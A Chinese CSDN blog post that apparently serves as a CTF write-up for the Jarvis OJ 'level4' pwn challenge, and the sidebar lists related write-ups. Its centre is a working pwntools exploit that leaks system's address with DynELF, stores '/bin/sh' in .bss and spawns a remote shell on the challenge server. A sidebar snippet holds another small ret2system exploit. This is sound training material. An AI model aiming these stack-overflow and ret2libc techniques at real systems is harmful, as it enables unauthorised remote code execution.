CTF-PWN-level4(jarvis oj)

最新推荐文章于 2022-11-30 17:31:25 发布
最新推荐文章于 2022-11-30 17:31:25 发布
阅读量290 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/87634205
版权

这道题只出现了read函数以及write函数。checksec也只发现了NX。

这次并没有给出libc的文件,所以我们可以考虑使用pwntools中的DynELF泄漏system地址,然后将'/bin/sh'写入.bss段中保存,在调用system函数的时候载入.bss保存的相应地址即可

exp如下

from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level4')
p=remote('pwn2.jarvisoj.com',9880)
e=ELF('./level4')
write_plt=e.symbols['write']
read_plt=e.symbols['read']
vul_addr=0x804844b
bss_addr=0x804a024
def leak(addr):
    payload1='a'*0x8c+p32(write_plt)+p32(vul_addr)+p32(1)+p32(addr)+p32(4)
    p.sendline(payload1)
    data=p.recv(4)
    return data
d=DynELF(leak,elf=e)
system_addr=d.lookup('system','libc')
payload2='a'*0x8c+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
p.sendline(payload2)
p.send('/bin/sh\x00')
payload3='a'*0x8c+p32(system_addr)+p32(0xdeadbeef)+p32(bss_addr)
p.sendline(payload3)
p.interactive()

 

SuperGate
关注
专栏目录
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1150
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 255
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis Oj Pwn 学习笔记-level4
baoan4763的博客
05-31 196
没有libc?!DynELF了解一下 来,链接: https://files.cnblogs.com/files/Magpie/level4.rar nc pwn2.jarvisoj.com 9880 我抽着差不多的烟,又check差不多的sec: 扔进IDA: 和level3差不多,只是这道题没有提供libc 这道题其实主要就是学一下pwntools的一个工...
Jarvis OJ-pwn level4(利用DynElf泄漏system地址)
hanqdi_的博客
02-07 233
pwn level4 借助DynELF实现无libc的漏洞:这篇讲的挺好 检查保护机制 ida打开文件,发现read函数栈溢出漏洞,想要用ret2libc解决,但是在漏洞函数前没有其他函数执行,所以不能进行泄漏函数得到libc版本。 在无libc情况下,通过DynELF进行泄漏system函数。有了system地址,但是没有binsh字符串,这里可以通过read函数,从标准输入,写到bss...
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1276
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
[BUUCTF]PWN——level4
mcmuyanga的博客
11-03 294
level4 附件 步骤: 例行检查,32位程序,开启了NX保护 运行一下程序,看看大概的情况 32位ida载入,首先检索程序里的字符串,根据上一步运行看到的字符串进行跳转 输入点在function里 参数buf存在溢出漏洞,字符串里没有找到现成的后门可以利用,所以使用ret2libc的方法来获取shell 利用过程: 泄露libc版本 只能通过程序里已经调用过的函数才行,这里利用的read函数 read_got=elf.got['read'] write_plt=elf.plt['writ
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2903
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
Jarvis OJ --level4
Kni9hT's Blog
11-11 250
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1622
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
[Bugku CTF——Pwn] pwn4
Y_peak的博客
03-22 531
[Bugku CTF——Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadget就好 思路 将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来 exploit from pwn import * #p = process('./pwn4_') p = remote('114.67.246.176',15541) pop_rdi = 0x00
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 431
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
BUUCTF------level4
qq_64558075的博客
12-19 717
最详细
[WUSTCTF2020]level1
chneft的博客
11-30 457
下载文件得到两个文件,一个无后缀的level1和一个output的txt文件,推测level1应该是可执行文件打开output看看。
快速排序
Pwnpanda的博客
12-17 180
顺便安利一波学习数据结构&&算法的好地方:VisuAlgo #include<iostream> using namespace std; int partition(int a[], int i, int j) { int p = a[i]; int m = i; for (int k = i + 1; k <= j; k++) { if (a[k...
[BUUCTF-pwn] 26-pwn4
weixin_52640415的博客
02-16 262
后边这两个都是格式化字符串漏洞,而且一看就是。不过都作了些限制。printf漏洞原则上可以写到任意位置也可以漏洞任意位置。这个难度就在于怎么绕过限制。 这题限制比较简单:长度只有32字节。 unsigned __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s[24]; // [rsp+0h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+18h] [rbp-8h]
Javisoj--PWN--fm
Jason_ZhouYetao的博客
12-09 1049
首先IDA看一波: 看到这里就可以很清楚的知道这个肯定是一个格式化字符串的题,因为这个涉及到了更改栈中的元素的值,第一眼看到这个X,你可能有点慌,因为你没有发现有关X的任何定义,不过没关系,没有任何定义就出现在IDA中的变量,他一定就是一个全局变量,在pseudocode界面直接双击x,发现界面发生了跳转: 这个可以直接看到x的地址:0x804A02C,这个在之后的格式化字符串中有着很...
CTF-RE-FindPass(Jarvis oj)
SuperGate的博客
12-27 622
分析源代码:  发现cha数组是从src.jpg图片里得到的信息,图片在apk反编译后的asset文件夹里找到。 在strings.xml文件中可以得到fkey的值 接下来就是理清逻辑思路写代码爆破。要注意的是cha数组里面有超过char类型的数据,因此要注意操作不要越界 以下是脚本代码 fil=open('src.jpg','rb') cha=[] fil.seek(0,0)...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值